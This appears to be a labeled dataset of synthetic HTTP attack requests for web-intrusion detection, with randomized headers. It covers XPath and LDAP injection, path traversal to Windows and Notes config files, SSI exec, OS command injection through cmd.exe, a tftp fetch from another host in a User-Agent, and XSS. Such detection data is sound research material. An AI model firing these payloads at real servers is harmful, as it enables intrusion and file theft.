Via: 0.7 114.197.200.42:9048, atf61i/5.8 www.niaar.htm, 1.3 122.137.121.36
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36330
Start - Id: 48817
class: XPathInjection
GET /OAJZqSN0J/eseaon/0UrKrj_xRdgUphp@7/prgd5aee/Itasatvnes/inaccess_logK5HdhomeO/yaweldanaehtsod/amnX0WjBFxhk0lnp/hj@PzZRdNHJ0qltpBp.js?_d2KugDk=094341&pth9eguy6ilCpg=r9ib0nrh%25hiiMe%3F&4n0rd=unionno&mnrsm=eqsvi6&nuaaena=mT%27+++or++1%3C+ar63y%2Fweit%2FLihc1%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++++or++++%27ac4r%27++++%3D%27&lh87e=update%2F HTTP/1.0
Host: 246.92.225.181
Connection: close
Accept: text/*, application/*;q=0.4
Accept-Charset: cp-950, windows-1257;q=0.3
Accept-Encoding: compress, deflate;q=0.2
Accept-Language: filrih2i-tti;q=0.0, En-esnzmPh;q=0.4
Cache-Control: only-if-cached
Client-ip: 166.142.219.107
Cookie: ejimrmsrrtpa5ee=izH;ayiuqxt=4rd;oJU7t=533369;awbt=qhbP.vx.lg;NP0Hhscripto6U=wvllsrlix
Cookie2: $Version="5"
Date: Wed, 18 Mar 09 13:49:31 CET
ETag: W/"FeTNgVNSYRe0fa7tY7"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sun, 22 Nov 09 21:54:43 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "e@nrx@bG2IYw9Bqyh"
If-None-Match: "bo6MEw4LrjPAOvEooCQ"
If-Range: Sat, 07 Jun 08 05:03:08 CET
Max-Forwards: 7649
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Digest nonce
Range: 5920-3
Referer: http://xpqNrli.ch/cafAei/uqss34h/ntke.jpeg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/5.3 (Windows; U; Win98 1.5; le-ph; rv:6.7.4) Gecko/55691049
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 5379207643
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48817
Start - Id: 38859
class: LdapInjection
GET /ei6ga986RP/ddtUIGTfmT.5hx.html?1DSYXHX-H3v=425304&sUucatHwalaw=swaINnd7qetl&Ke1J@union3=3zle&otgfsm1rdnn=6122%29%28%26%28objectClass%3Dnrhw%29%28%7C%28sn%3D++tya%29%28cn%3Dndsp++J*%29%29&rsserdluypensil=8702117&RyUui4rS8ynr=aw%27%3Bs0%3A HTTP/1.0
Host: www.orbeaf3E.be
Connection: 6iBh
Accept: application/*, image/jpeg;q=0.1
Accept-Charset: iso-8859-1;q=0.2
Accept-Encoding: *
Accept-Language: o00-8, rokda-lOe5i;q=0.4, lysweal-littis;q=0.2, ts8x2qro-tnun, e9-teb9c;q=0.9
Cache-Control: no-store
Client-ip: 149.133.119.108
Cookie: athIggo=0;opIt2=sLsoa;ede=Bylnrcn8wser;mpokNesnmttt=79614918;ushtg=msUopassthru;siYy=u2og
Cookie2: $Version="90"
Date: Mon, 04 Sep 06 13:53:11 UTC
ETag: "bVKwugiMy5hN4Kvx_jnd"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Wed, 24 Mar 10 20:52:08 GMT
If-Unmodified-Since: Wed, 23 Jan 08 14:07:09 UTC
If-Match: "@HsUsniKDyrfc9rZRT"
If-None-Match: "-TK5-yCJjZAv.aKI7jV"
If-Range: Mon, 27 Jun 05 16:58:12 CET
Max-Forwards: 17
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic ZWxOdWE6b2VwZG53eQ==
Authorization: Digest qop=auth
Range: 317-,-056
Referer: /ansult/czAsc/exehet.exe
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/1.4 (compatible; MSIE 8.9; Open BSD i386; tSttneo; densa1; nwri)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.1 10.199.113.222
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 379 www.6ysC.gif "edmne8u3araEnhR" 
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38859
Start - Id: 36037
class: PathTransversal
GET /edaeswac/SC7CF/rms0Fgs5yLAPD/tmpQdS0w/7to5nnqWsceeiyghf/eette7I8etfAhw/olO.jpg?qodoctiussseeTu=r%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.1
Host: www.8svmsegiee.net
Connection: keep-alive
Accept: audio/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: compress, identity, gzip;q=0.0
Accept-Language: *;q=0.2
Cache-Control: min-fresh=6
Client-ip: 87.93.92.255
Cookie: 3repx9inrRe73A=0314880501
Cookie2: $Version="8"
Date: Tue, 22 Nov 05 03:15:31 CET
ETag: "dqM_4UuMnTQ3BNZBkT-X"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Fri, 26 Jan 07 09:41:05 GMT
If-Unmodified-Since: Wed, 24 May 06 12:49:29 UTC
If-Match: "KXOfqYbLOulBH9BZM"
If-None-Match: "2eCXn@u.Jlf6W7HsT"
If-Range: Mon, 08 May 06 10:09:37 UTC
Max-Forwards: 69
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: surhtU Telh4=i3hp
Range: 709-485
Referer: http://so6S0a.com/rjvenin/nbfmaoo.mpeg
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 6.1; is-rZ; rv:7.0.9) Gecko/25451069
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: gzip
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36037
Start - Id: 45110
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 156.22.130.49
Connection: kudose2t
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip, gzip
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 253.161.164.98
Cookie: hu=7606777;AGo3YSdborr46=o;oEdp=artbsk8zb;ieehidOlthe0=uhuhNt6ucttri
Cookie2: $Version="1"
Date: Wed, 15 Apr 09 09:05:20 CET
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: uhxrdEf=ynXs4rl3
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Tue, 20 Apr 10 20:45:39 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 41
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Digest nonce
Range: -3,456-488022
Referer: /6ymRs/t4oqoEnr.mdb
TE: trailers
Trailer: Referer
User-Agent: rTKLACrGpE http://www.3ikrtTml.de
UA-CPU: StrongARM
UA-Disp: 9898,841,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 213x015
Via: HTTP/5.7 www.twtBe.html, 5.7 162.246.250.192
Transfer-Encoding: oitg; y5deeisu=ieebsdtc
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45110
Start - Id: 39346
class: SSI
GET /hjz0kRbA4jm7hI1-T0/nimb91ne/_b2/rx._a-ZC03FK.gif?eyEszh=42788&@eW1JCQR=%3C%21--%23email+fromhost%3D%22www.rqddtsw.com%22+tohost%3D%22mailbox.MNen.com%22+message%3D%22tmmo+3e8eqT+anE+lryee%22+fromaddress%3D%22ksE9.com%22+toaddress%3D%22h9rT.iU.com%22+subject%3D%228s%22+sender%3D%22lR.com%22+replyto%3D%22Onotr.com%22+cc%3D%22bt%22+inreplyto%3D%22nj+htf+enoiBj%22+id%3D%22srmail%22+--%3E&uKlreplace5T=ls&7kJai=395651&ptsbn=3575183&at5doarEuyCorix=ooSBta&lWvZcatdIQ7=iz HTTP/1.0
Host: www.fjiiw.uk:8
Connection: keep-alive
Accept: application/rtf, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: sstrlprl-nlliu1Og;q=0.8, Sor-LTdmsws;q=0.0, cojbwce-grt;q=0.4, eviGt-v1sd;q=0.2, tft-92faths;q=0.7
Cache-Control: min-fresh=0342
Client-ip: 199.161.172.175
Cookie: fttSd6eaal4shd=11;nwah=homehtyaccess_log;63nt=eall|votrTl;nhrQRsxsgnricT=8223;oee5irfio48booa=csat?9e
Cookie2: $Version="74"
Date: Tue, 14 Jun 05 20:30:09 CET
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Tue, 28 Oct 08 13:24:25 CET
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: "Khm6Ca4oo_r1b1gXw7"
If-Range: Fri, 08 Dec 06 12:30:55 GMT
Max-Forwards: 7075
MIME-Version: 2.9
Pragma: laoi='s1'
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Basic c2FJYmV5OmV3dGZiNA==
Range: 80-3,5062-096637
Referer: http://vdts4re.it/b1ut/eand/hrfnewu/06rrlui/atOnt.png
TE: trailers,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/7.4 (compatible; MSIE 1.4; Linux i586; issNpag6ul; urhL)
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5277x2991
Via: pol1et/3.2 208.247.58.3, tgeld/5.6 26.150.182.93:087
Transfer-Encoding: 6m4f; thuaijt=aeYeat
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 168.152.115.238
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39346
Start - Id: 40333
class: SSI
GET /inxmlM0v5NV/lhehnn/SLKBH/r_pQ9x_ctd3a/eeea2aaWnmxEho/oeotsrthhezS/innrDCru/bodnntbpdtUH/oKPq6.aspx?rueentrg=pvKb9c&epW7=tinputtt6s&a1dmsSiEvcnrtn1=yyh8sLYyFxw_&dsf=ro1itrrsneetaRnehd&7fdebwstmtitss=ohat1S8nus0lt0dsu&2j4Je=tt4mooies%7E&ritoSu=L%3EdSrh&54ia5pyhtPhn=%3C%21--+%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Cetiatn%5Clee7s%5Crdosdae8.exe++d%3A%5Cyl%5Cwww.chre.org%5Cxm7yIosiei%5Cdatabase.mdb+%2Fx+exporttofoxpro%22--%3E&ehsarwj=aGoc1XesH7&zqPte232ei=Mq&Wctc=rev1hDiaaieahr&rd=53557&iiyigRrtatrTse=kmczie&gaormd8linth3=bro&aeaoxondfe=yiehoieacr HTTP/1.1
Host: 54.98.219.189
Connection: close
Accept: audio/basic, video/mpeg
Accept-Charset: iso-10646-ucs-2, cp-950, iso-8859-2;q=0.2, koi8-r;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: maaplnq-oiqS8isi;q=0.8, sseao-xaS, Mdu-1;q=0.2, t-s0t;q=0.5, iMaho-1mrk;q=0.1
Cache-Control: only-if-cached
Client-ip: 227.85.148.49
Cookie: Tq4A5L=7wthltta
Date: Tue, 13 Sep 05 13:56:53 GMT
ETag: "-2SnMmPGNUPDo6afli"
If-Modified-Since: Tue, 03 Feb 09 19:11:07 UTC
If-Unmodified-Since: Sun, 11 Nov 07 18:38:01 UTC
If-None-Match: *
If-Range: "F22Ya1-JPXi289EQ_p"
Max-Forwards: 1663
MIME-Version: 3.8
Pragma: TrzeibRe='ramk89'
Authorization: Digest qop=auth
Range: -636724,210954-
Referer: http://www.ioerU8bs.gov/rsTnia.avi
TE: deflate;q=0.6,gzip
User-Agent: eENMuN7gh http://www.t7btnktf.it
UA-Disp: 041,313,32
UA-Pixels: 384x228
Transfer-Encoding: identity
Warning: 159 www.sK2gz.js "resE1stsdnq" "Fri, 29 May 09 15:41:02 GMT"
X-Forwarded-For: 42.162.17.85
X-Serial-Number: 22985

null

End - Id: 40333
Start - Id: 36044
class: PathTransversal
GET /sF/nheO./cWunionHmailYotxtqZa1/hmail_aDw9qtG/hj2J5WS/s6MW0h4GU.mJ.t9Is.png?numCdgeaiT8=zon%3AenS+%5Dbtro%5Deenp-e&eeuyten=hNu&dstithfi3hln=i%3A%5Cwindows%5Cboot.ini&GY1S=89090300&amSEn=Le&ol=rv+l27tiei%7ChL2eghtpass+re&e31eooe9oedpr3=r29en4+%2B&boedooiesq=o%3Ecrm HTTP/1.1
Host: www.atereo.st
Connection: keep-alive
Accept: video/mpeg, audio/basic;q=0.6, application/postscript;q=0.7
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: kgNm-d;q=0.9, dhthhl-tul0;q=0.0, 3-Aunb;q=0.5
Cache-Control: max-stale
Client-ip: 70.170.187.44
Cookie: gtdoEo=7KBxF;Cha4r4xojRe8dsr=101392;ND4formh-Ls2telnet=b hobexect?0certotsB;titlAsjhirun=pfL1xetaieee8a8Xd;eettp=61921
Cookie2: $Version="69"
Date: Wed, 02 Nov 05 12:04:26 GMT
ETag: "vMwXfxAOGf.iAlaz.3g6"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Tue, 29 Aug 06 24:10:42 CET
If-Match: "cpJg7Avs94O@02kroeWj"
If-None-Match: *
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 38
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="cK41eie"
Range: 709-485
Referer: /loni/uaat/2ton.png
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.8 (X11; U; Solaris 0.7; nm-7v; rv:6.6.7) Gecko/69974655
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.7 www.aunei.gif
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36044
Start - Id: 44355
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.8lvsonoucU.uk
Connection: wrevrqoo
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic, x-mac-hebrew, iso-8859-1;q=0.1
Accept-Encoding: 
Accept-Language: a5Eeie-eian;q=0.8, srcg-p52cwo
Cache-Control: max-stale=5
Client-ip: 206.144.99.228
Cookie: isvhnienixoN8to=eGJZ_Ghj;Tisnlm=012323
Cookie2: $Version="2"
Date: Mon, 01 May 06 11:00:20 UTC
ETag: "EeqXjCS5PORBp-bwP8v4"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Tue, 29 Jan 08 02:51:14 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: "Om_ZesJafUZ9OevCH"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: NTLM dGNtdDNvdG5odmNnZ3Vucm5lc29uZHR0eDd0QW9lQWU4TnR1Y2l5b2Q=
Range: -601,-24981
Referer: http://www.6norfuaO.org/enaa/ras2sa.mspx
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/0.2 (X11; U; Linux i586 1.7; ee-ee; rv:9.7.4) Gecko/42198237
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44355
Start - Id: 45604
class: PathTransversal
GET /keHG/dztett/nos0xIwenaeavu/pNSs16oMZADt/dsZey6neGetnp9it5Eao/lthredSys/5FhpassthruG4kRconnectd4O1/9onluinjosyr/hrlstemenZuo5iqb1mF/dAMaQ7rP0A2NMKH98zR.shtml?BhVO4Zpm=0953&naTwSen=eqytd%3Ethh&oF=a9r%3B86y5f&wtipTWSjinsl=38&esrhhsjetn=Wm&ehscga=lX%40wQGvu&twr6Adl=snull&9cih7ltmntth5k9=o9nwti8xpgtizeer7&t0oaocHnUmgtm=tbSdhd4ithde6ai&9eWhse0sm=205197&tttix=AaRoCshajiy3&gisist=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&XQ1R_Oj=494203&abssnrsef5s5l=87&hcor=w7VqSRz-GoIP HTTP/1.1
Host: www.na5wtm6tnh.net:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: utf-7;q=0.8, windows-1252;q=0.3, utf-8;q=0.3, iso-8859-5;q=0.1
Accept-Encoding: 
Accept-Language: aire-ad1ctpol
Cache-Control: no-cache
Client-ip: 145.209.224.15
Cookie: qUPA4F4var9HvJ=acs2awherehg9n1t;rwedc5f=38;opwae=Utahoeta  6z;2Tt6tedmtsmaa=137
Cookie2: $Version="74"
Date: Wed, 14 Jan 04 24:48:45 UTC
ETag: "1uZHYBpjmXTTQQw"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Sun, 22 Jan 06 07:30:39 GMT
If-Unmodified-Since: Sat, 10 Mar 07 14:04:41 CET
If-Match: *
If-None-Match: "tIp05M.7R5.ZKjsc8_"
If-Range: Thu, 11 Sep 08 01:32:14 CET
Max-Forwards: 7
MIME-Version: 6.5
Pragma: 5pestsa=li
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: http://wouceyd.com/de6le.jpeg
TE: deflate;q=0.5,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/7.8 (compatible; atyul; Win 9x; OT6o; w2rsg)
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 413x730
Via: FTP/4.0 160.191.136.47, hg5mbt/2.5 www.dooIt.js, le1to/2.0 4.147.89.41
Transfer-Encoding: deflate
Upgrade: lsf/8.1, rxeP4b/0.5, dc3n5/4.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 228.147.206.124
X-Serial-Number: 749320741
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45604
Start - Id: 42822
class: OsCommanding
PUT /m90uXdDYfuy9fgqyL2B2/IXDOLn017Q/nlinkscriptZW/Eaocnyeera/zsdg512eXx/tO/Sdsj8accept3PcYKBn-A/0sezOs/sTsestcmishT1tobNs/stdinUGcObqk/tyLdeae74Niy.cgi? HTTP/1.1
Content-Length: 242
Content-Language: tfstEo,ts8,d
Content-Encoding: deflate
Content-Location: /hhEE.exe
Content-MD5: NmhsYXpuYWdka29vejVpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Apr 06 04:04:35 CET
Last-Modified: Sun, 21 Aug 05 23:27:12 GMT
Host: 17.240.8.188
Connection: 9hIljo
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ao-oves;q=0.7, btntpH-he, w-mTniuyg9, Slcrs5y-i;q=0.7, SyUwfen-srk
Cache-Control: min-fresh=829
Client-ip: 114.218.58.189
Cookie: ty=include;6ckolKxdmsYicdx=42413942;ar2irh=5335;ueqz=155419
Cookie2: $Version="444"
Date: Sun, 30 Sep 07 03:08:51 UTC
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Thu, 30 Sep 04 17:58:41 CET
If-Unmodified-Since: Fri, 14 Mar 08 11:57:36 CET
If-Match: "itmYRfSEF_OuuO0xH"
If-None-Match: *
If-Range: "gfpaa.SIUenIVxdO"
Max-Forwards: 8
Pragma: 3i='ohtog8n'
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.mandee.de/tnwt.php
Referer: http://thdato.it/yrAFa/neas/m3zhhgp.cfm
TE: deflate,chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 4.3; lh-Hs; rv:0.3.4) Gecko/79298157
UA-Pixels: 0367x479
Via: m2ht/6.2 166.13.184.56:2, HTTP/8.9 170.6.70.105
Transfer-Encoding: gzip
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rswhin5slu=gP7Pw&wie94=d&UNpusjsgMahrwie=ele fe5ch &iranes4ii7pKe=2405133&utxdCuuaonvwAe=s&txo5NXB4=ikfjD@tZ&ielnl3a1btx=okr&crbonn=00&rVEda=ecrcR&seoh=O1ntaa7retemrulonusr&5dsvxndisFiom=68324684&nmEeapae=225.125.200.113    | cmd.exe /s

End - Id: 42822
Start - Id: 49493
class: XPathInjection
GET /fmth-e_3jeX0mmqEm/oe4e2kosd/tgvHIn.pl?thWq9hebaFtn0p=4Totmr1riLnlilr&giCdeaeEfr=nsyhyey1rpt6t&s8nede=7bit&-xGfrom=96558&nt=37122&raohahlihweaofy=hfetdbll%24&age=da8e%29eene0trmalocationdAsama&ine=wherel%27e&tlc=062+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++604%3D&idL8AP3=ehto1e9rg&LAjscriptRaEdO-Ar=ncjr&PscriptRLob@=oas2de&dol=i+%3Dadd HTTP/1.0
Host: 207.220.206.122
Connection: close
Accept: audio/*;q=0.2, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: scopgko-hT;q=0.0
Cache-Control: Li='goev'
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Mon, 28 May 07 05:21:23 CET
ETag: "JDg6S18LaQ9Ja_0YULOc"
Expect: zimlrze=7x4eo
From: heDlu@i6la6.fr
If-Modified-Since: Tue, 10 Jan 06 06:29:53 UTC
If-Unmodified-Since: Tue, 05 Sep 06 17:04:25 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Mar 07 19:01:58 CET
Max-Forwards: 3
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: urdmey er4o=atlis
Range: -012
Referer: http://hdve.de/RiearctT.jsp
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/4.2 (Windows; U; WinNT 0.3; xc-f1; rv:5.2.5) Gecko/73957468
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 769 www.giteyoe.png "lena5ieoo" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49493
Start - Id: 44626
class: OsCommanding
POST /g7Lz3bBPHu4u1/ypm7I0b.oX19Y-/MsetcodLKXnW/CadieiENtshtecf.bin? HTTP/1.1
Content-Length: 144
Content-Language: witasrrt,oaTr5A
Content-Encoding: deflate
Content-MD5: cGloRWR0dDhGYWkwaWhodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Aug 05 22:03:53 CET
Last-Modified: Tue, 04 Dec 07 23:30:48 CET
Host: www.NT6edn.cz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis;q=0.5
Accept-Encoding: deflate, compress;q=0.2, deflate;q=0.2, identity;q=0.3
Accept-Language: Eohe-bb;q=0.8, criam-03tieeWo;q=0.8, 6r-rgs;q=0.8, 9dit-agesx
Cache-Control: no-store
Client-ip: 245.135.98.39
Date: Mon, 20 Nov 06 04:57:58 GMT
ETag: "16q9@Ua-RPJY6FcFm"
From: r8Aeino@aanorn6.ch
If-Unmodified-Since: Wed, 05 Jan 05 24:03:33 GMT
If-Match: *
If-None-Match: "_pSm1mt0h4f.LQB.YC5"
If-Range: *
Pragma: hloebeL='d8'
Authorization: la9eh y9mfmdw=e8ii4
Referer: /iTGfto/7dnF.jpeg
TE: chunked;q=0.9
Trailer: Proxy-Authorization
User-Agent: 38.56.47.196 |tftp 192.168.10.33 evil.txt
Via: 1.4 www.Lteai.jpeg, 4.8 www.Nhae.js, 3.1 40.175.102.193
Upgrade: otm/9.8, Harn/8.5, mieNo/6.6, enu/6.2, cor/7.1

jnayu=e5y@Hcp&st3athlSkRns6ir=%mgnr6&deIimnUt=do1&obaes4=fesock_streamcg&bineeseat2atteT=ovax&pso0Tmos=tPqzs&hen2estihIrsy1=Ipizthd3rrtWa9ls

End - Id: 44626
Start - Id: 47477
class: XSS
GET /D0ffLt/bh/Tamurheh/xI9mF/t2/7eaenmo/wp-vbscriptrv/iocv/wIjc2mq3Qbg2x8/hmHeLzc1eZhY/eKXeGGJ_L7Ct4Z.html?plpn9nroue2m=%3Cdiv+++++style++++%3D+%22+++behaviour%3A+url%28%5Bhttp%3A%2F%2Fwww.land.com%2Fscript%2Fiee.php3%5D%29%3B+++++%22+%3E&BkmrcpfromY0yImal=gscYi&deofno5x=90162&ceag=10&jsvDeRsdieba=ues&nwunltcr=tgVw&ydRift=ehsd&Afeyi8=cwinntmr%2BcR&ai7aoha=8&anC3te=Agt8ug53omietrtnn&Edrnnrr=nl_iI&ing6iPfhtpassY_5=eEhnemkd HTTP/1.1
Host: www.vtcugebwhq.st
Connection: urth4
Accept: text/xml, video/quicktime;q=0.8
Accept-Charset: koi8;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: ass-l, qdcytne-teqox;q=0.0, xO3ni-hf7omoId;q=0.8, o7gfs-t;q=0.9, hEzf4R-lseEeso;q=0.8
Cache-Control: no-transform
Client-ip: 205.71.159.23
Cookie: dd=ertoioeOsh;dtFuis=ttobiset;te7hnenhhanhec=[l8yaiv;U6Hkq=8084;o1lsieoe=bIs42w9t-s =H;rieNppehiaeu=window.open
Cookie2: $Version="8"
Date: Sun, 15 Feb 04 23:46:42 CET
ETag: W/"lWkzjjgEDYcIKD0"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 12 Dec 05 12:32:05 GMT
If-Unmodified-Since: Fri, 03 Apr 09 18:36:18 UTC
If-Match: *
If-None-Match: *
If-Range: "xWI6fxHnIrlp2GIbtJc"
Max-Forwards: 8265
MIME-Version: 6.3
Pragma: moHet=othrsne
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: http://www.srfae.de/nteGl/enkse/simwuad.shtml
TE: trailers,trailers
Trailer: If-Match
User-Agent: r9re1ui/6.2.2
UA-CPU: StrongARM
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color32
